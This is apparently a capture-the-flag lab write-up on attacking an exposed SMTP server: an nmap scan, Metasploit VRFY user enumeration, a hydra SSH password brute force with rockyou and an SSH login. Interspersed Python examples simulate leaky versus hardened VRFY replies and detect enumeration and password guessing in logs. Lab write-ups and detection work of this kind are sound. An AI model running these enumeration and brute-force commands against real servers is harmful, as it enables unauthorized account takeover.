Exploiting SMTP

Oct 17, 2024

How to Enumerate and Exploit an Exposed SMTP (Mail) Server

💻 THM CTF Reference


SMTP

Simple Mail Transfer Protocol, aka SMTP, is the protocol by which mail servers and clients hand mail to each other. If we were to compare the email service to the postal delivery service, SMTP would be the courier, delivering mail from the post office to the recipient’s address, except in this case every address is also its own post office. The courier tends to know important information about its sender, so we’ll be trying to get as much information out of it as we can. Thankfully the SMTP service is very receptive to questions, so we will be able to pry valuable insights from it in order to compromise its server.

Identifying the SMTP Service

The first step in identifying possible attack vectors is running an Nmap network scan to see which ports are open and which of them expose services we know how to abuse. In this case we’re looking for port 25 exposing the SMTP service to the internet.

Example Nmap scan (SMTP line highlighted):

root@ip-10-10-22-136:~# IP=10.10.190.97
root@ip-10-10-22-136:~# nmap -sS -T4 -F -oN output.txt $IP

Nmap scan report for ip-10-10-190-97.eu-west-1.compute.internal (10.10.190.97)
Host is up (0.00070s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
25/tcp open  smtp
MAC Address: 02:87:B2:A3:3F:17 (Unknown)
# Nmap done at Sun Oct  6 01:22:55 2024 -- 1 IP address (1 host up) scanned in 1.68 seconds
ℹ️
The call above uses the flag -sS to perform a stealthy SYN scan, which is faster and less detectable than a full connection scan. The -T4 flag sets the timing template to be faster than the default, balancing speed and accuracy. The -F flag specifies a fast scan that targets the top 100 most common ports. The -oN output.txt flag saves the scan results in a normal format to a file named output.txt. Finally, $IP specifies the target IP address for the scan.

Getting the SMTP server metadata

Now that we’ve identified a way in, we can use a premade SMTP reconnaissance module to extract as much valuable metadata as we can, in this case Metasploit’s smtp_version scanner. Here we’re able to extract the SMTP server’s hostname and software banner (Postfix on Ubuntu) but not much else that’s useful. We’ll try a more aggressive module next.

msfconsole
msf6 > use auxiliary/scanner/smtp/smtp_version
msf6 auxiliary(scanner/smtp/smtp_version) > set RHOSTS 10.10.22.136


Module options (auxiliary/scanner/smtp/smtp_version):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS   10.10.22.136     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT    25               yes       The target port (TCP)
THREADS  1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smtp/smtp_version) > run

[+] 10.10.190.97:25       - 10.10.190.97:25 SMTP 220 polosmtp.home ESMTP Postfix (Ubuntu)\x0d\x0a
[*] 10.10.190.97:25       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Finding the SMTP server exposed usernames

We’ll try to brute force our SMTP courier to get it to tell us who it expects us to be talking to. We’ll keep asking it whether it recognizes the name we give it, with an enumeration brute force attack, and hopefully we’ll get a match. In this case we were able to tell that the SMTP server knows the user “administrator”, which gives us valuable insight into a possible user on the system. It is especially exciting to confirm the existence of an administrator user, because compromising their account can lead to unrestricted access to the entire server!

msf6 auxiliary(scanner/smtp/smtp_version) > use /auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.190.97
msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > run


[*] 10.10.190.97:25       - 10.10.190.97:25 Banner: 220 polosmtp.home ESMTP Postfix (Ubuntu)
[+] 10.10.190.97:25       - 10.10.190.97:25 Users found: administrator
[*] 10.10.190.97:25       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
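To see why the module above gets a hit, here is an added example (not code from the write-up, from Metasploit or from Postfix): an in-memory SMTP command responder that answers VRFY the way a leaky server does, beside the hardened behaviour. The `SmtpResponder` class, the `LOCAL_USERS` list and the probe names are constructed for illustration; the reply codes follow RFC 5321 (250 = mailbox known, 550 = unknown, 252 = the server will not confirm, which is what Postfix returns once `disable_vrfy_command = yes` is set in main.cf).

```python
"""Why VRFY-based enumeration works, and what a hardened server answers.

Added example: an in-memory responder with no sockets. `SmtpResponder`,
`LOCAL_USERS` and the probe names are assumptions for illustration.
"""

LOCAL_USERS = {"administrator", "postmaster"}  # constructed mailbox list


class SmtpResponder:
    """Minimal server-side state machine for the commands that matter here."""

    def __init__(self, hostname="polosmtp.home", vrfy_enabled=True):
        self.hostname = hostname
        self.vrfy_enabled = vrfy_enabled
        self.greeted = False

    def banner(self):
        # The 220 greeting is what smtp_version grabbed in the write-up.
        return f"220 {self.hostname} ESMTP"

    def handle(self, line):
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.greeted = True
            return f"250 {self.hostname}"
        if not self.greeted:
            return "503 5.5.1 Error: send HELO/EHLO first"
        if verb == "VRFY":
            if not self.vrfy_enabled:
                # Hardened: identical reply for every name, so nothing is learned.
                return "252 2.0.0 VRFY command is disabled"
            user = arg.strip().strip("<>").split("@")[0].lower()
            if user in LOCAL_USERS:
                return f"250 2.1.5 <{user}@{self.hostname}>"
            # Leaky: a distinct reply for unknown names is the enumeration oracle.
            return f"550 5.1.1 <{arg}>: Recipient address rejected: User unknown"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        return "502 5.5.2 Error: command not recognized"


def session_transcript(server, client_lines):
    """Run a scripted client against the responder; return (sent, reply) pairs."""
    out = [("", server.banner())]
    for line in client_lines:
        out.append((line, server.handle(line)))
    return out


def confirmed_users(vrfy_enabled, probe_names):
    """Names the server confirms with a 250: exactly what smtp_enum reports."""
    server = SmtpResponder(vrfy_enabled=vrfy_enabled)
    server.handle("EHLO probe")
    return {n for n in probe_names if server.handle(f"VRFY {n}").startswith("250")}


if __name__ == "__main__":
    probes = ["root", "administrator", "guest"]
    for enabled in (True, False):
        print(f"--- disable_vrfy_command = {'no' if enabled else 'yes'} ---")
        script = ["EHLO probe"] + [f"VRFY {p}" for p in probes] + ["QUIT"]
        for sent, reply in session_transcript(SmtpResponder(vrfy_enabled=enabled), script):
            if sent:
                print("  C:", sent)
            print("  S:", reply)
        print("confirmed:", confirmed_users(enabled, probes))
```

With VRFY enabled the transcript confirms `administrator` and rejects the rest; with it disabled every probe gets the same 252, so the wordlist run in the write-up would return nothing. The other check worth knowing is that Postfix also answers `RCPT TO:` with 550 for unknown local users unless `smtpd_recipient_restrictions` and `local_recipient_maps` are tuned, so disabling VRFY alone narrows the oracle rather than closing it.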

Running Hydra to Brute Force the password

This isn’t a very nice way to break into a system but we’ll continue to use the brute force enumeration approach along with the username we found to try to log into the server via ssh. We’ll use the hydra tool to enumerate different passwords until we get one that works.

Luckily there was a direct match and we found a password for the administrator user; if only it were always this simple 😊

hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.190.97 ssh

[22][ssh] host: 10.10.190.97   login: administrator   password: alejandro
[STATUS] attack finished for 10.10.190.97 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
ℹ️
The call above uses -t 16 to spawn 16 parallel login attempts for the username given with -l administrator, taking candidate passwords from the file given with -P /usr/share/wordlists/rockyou.txt, against the server’s IP over ssh, with -vV for very verbose output.
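Both the VRFY enumeration above and this hydra run leave an unmistakable pattern on the server: many rejected VRFY commands from one client in seconds, then many failed SSH passwords for one account from the same source, followed by an accepted login. The following added example (not from the write-up) runs a sliding-window burst detector over a log excerpt constructed in Postfix smtpd / OpenSSH sshd syslog style for the hosts in the write-up (attacker 10.10.22.136, mail host polosmtp). The regexes, the 5-events-in-60-seconds threshold and the alert names are assumptions to tune for a real deployment.

```python
"""Spot VRFY enumeration and SSH password guessing in server logs.

Added example. SAMPLE_LOG is constructed; patterns and thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
Oct 17 10:00:01 polosmtp postfix/smtpd[1201]: connect from unknown[10.10.22.136]
Oct 17 10:00:02 polosmtp postfix/smtpd[1201]: NOQUEUE: reject: VRFY from unknown[10.10.22.136]: 550 5.1.1 <root>: Recipient address rejected: User unknown in local recipient table; to=<root> proto=ESMTP helo=<scan>
Oct 17 10:00:02 polosmtp postfix/smtpd[1201]: NOQUEUE: reject: VRFY from unknown[10.10.22.136]: 550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table; to=<admin> proto=ESMTP helo=<scan>
Oct 17 10:00:03 polosmtp postfix/smtpd[1201]: NOQUEUE: reject: VRFY from unknown[10.10.22.136]: 550 5.1.1 <guest>: Recipient address rejected: User unknown in local recipient table; to=<guest> proto=ESMTP helo=<scan>
Oct 17 10:00:03 polosmtp postfix/smtpd[1201]: NOQUEUE: reject: VRFY from unknown[10.10.22.136]: 550 5.1.1 <test>: Recipient address rejected: User unknown in local recipient table; to=<test> proto=ESMTP helo=<scan>
Oct 17 10:00:04 polosmtp postfix/smtpd[1201]: NOQUEUE: reject: VRFY from unknown[10.10.22.136]: 550 5.1.1 <info>: Recipient address rejected: User unknown in local recipient table; to=<info> proto=ESMTP helo=<scan>
Oct 17 10:00:04 polosmtp postfix/smtpd[1201]: NOQUEUE: reject: VRFY from unknown[10.10.22.136]: 550 5.1.1 <user>: Recipient address rejected: User unknown in local recipient table; to=<user> proto=ESMTP helo=<scan>
Oct 17 10:00:31 polosmtp postfix/smtpd[1210]: NOQUEUE: reject: VRFY from mail.example.net[192.0.2.10]: 550 5.1.1 <bob>: Recipient address rejected: User unknown in local recipient table; to=<bob> proto=ESMTP helo=<mail.example.net>
Oct 17 10:05:00 polosmtp sshd[1300]: Failed password for administrator from 10.10.22.136 port 51000 ssh2
Oct 17 10:05:00 polosmtp sshd[1301]: Failed password for administrator from 10.10.22.136 port 51001 ssh2
Oct 17 10:05:01 polosmtp sshd[1302]: Failed password for administrator from 10.10.22.136 port 51002 ssh2
Oct 17 10:05:01 polosmtp sshd[1303]: Failed password for administrator from 10.10.22.136 port 51003 ssh2
Oct 17 10:05:02 polosmtp sshd[1304]: Failed password for administrator from 10.10.22.136 port 51004 ssh2
Oct 17 10:05:02 polosmtp sshd[1305]: Failed password for administrator from 10.10.22.136 port 51005 ssh2
Oct 17 10:05:03 polosmtp sshd[1306]: Accepted password for administrator from 10.10.22.136 port 51006 ssh2
Oct 17 10:20:00 polosmtp sshd[1400]: Failed password for administrator from 192.0.2.10 port 40000 ssh2
"""

TS = r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ "  # syslog timestamp + hostname
VRFY_RE = re.compile(TS + r"postfix/smtpd\[\d+\]: NOQUEUE: reject: VRFY from \S+\[([\d.]+)\]")
SSH_FAIL_RE = re.compile(TS + r"sshd\[\d+\]: Failed password for (?:invalid user )?\S+ from ([\d.]+)")
SSH_OK_RE = re.compile(TS + r"sshd\[\d+\]: Accepted \S+ for (\S+) from ([\d.]+)")


def _ts(text):
    # Syslog stamps carry no year; pin one so the arithmetic stays consistent.
    return datetime.strptime(text, "%b %d %H:%M:%S").replace(year=2024)


def parse_events(log_text):
    """Return (kind, source_ip, timestamp) for the lines that matter."""
    events = []
    for line in log_text.splitlines():
        if m := VRFY_RE.match(line):
            events.append(("smtp_vrfy", m.group(2), _ts(m.group(1))))
        elif m := SSH_FAIL_RE.match(line):
            events.append(("ssh_fail", m.group(2), _ts(m.group(1))))
        elif m := SSH_OK_RE.match(line):
            events.append(("ssh_ok", m.group(3), _ts(m.group(1))))
    return events


def find_bursts(events, threshold=5, window_seconds=60):
    """Sources with >= threshold events of one kind inside a sliding window."""
    stamps_by = defaultdict(list)
    for kind, ip, ts in events:
        if kind in ("smtp_vrfy", "ssh_fail"):
            stamps_by[(kind, ip)].append(ts)
    alerts = []
    for (kind, ip), stamps in sorted(stamps_by.items()):
        stamps.sort()
        best = start = 0
        for end in range(len(stamps)):
            while (stamps[end] - stamps[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append((kind, ip, best))
    return alerts


def successes_after_burst(events, alerts):
    """Highest-signal finding: a login accepted from a source already guessing."""
    guessing = {ip for kind, ip, _ in alerts if kind == "ssh_fail"}
    return [(ip, ts) for kind, ip, ts in events if kind == "ssh_ok" and ip in guessing]


if __name__ == "__main__":
    ev = parse_events(SAMPLE_LOG)
    al = find_bursts(ev)
    for kind, ip, n in al:
        print(f"[ALERT] {kind}: {n} events from {ip} inside 60s")
    for ip, ts in successes_after_burst(ev, al):
        print(f"[ALERT] ssh login accepted from guessing source {ip} at {ts:%H:%M:%S}")
```

The single VRFY and single failed login from 192.0.2.10 stay below threshold, which is the point of windowing rather than counting totals: legitimate mail peers do occasionally probe a bad address. On the prevention side the same two lines in the logs map to `disable_vrfy_command = yes` in Postfix and to key-only or rate-limited SSH authentication (e.g. `MaxAuthTries`, `PasswordAuthentication no`), which would have turned the hydra run into noise rather than a foothold.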

Logging into the server with credentials

Equipped with a username and password, we can easily SSH into the server unless it has other protections in place.

ssh administrator@10.10.190.97
administrator@10.10.190.97's password: alejandro

Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-111-generic x86_64)

administrator@polosmtp:~$

Connect with Me

If you found this write-up helpful, follow me on Twitter for more content like this. Happy hacking! 👾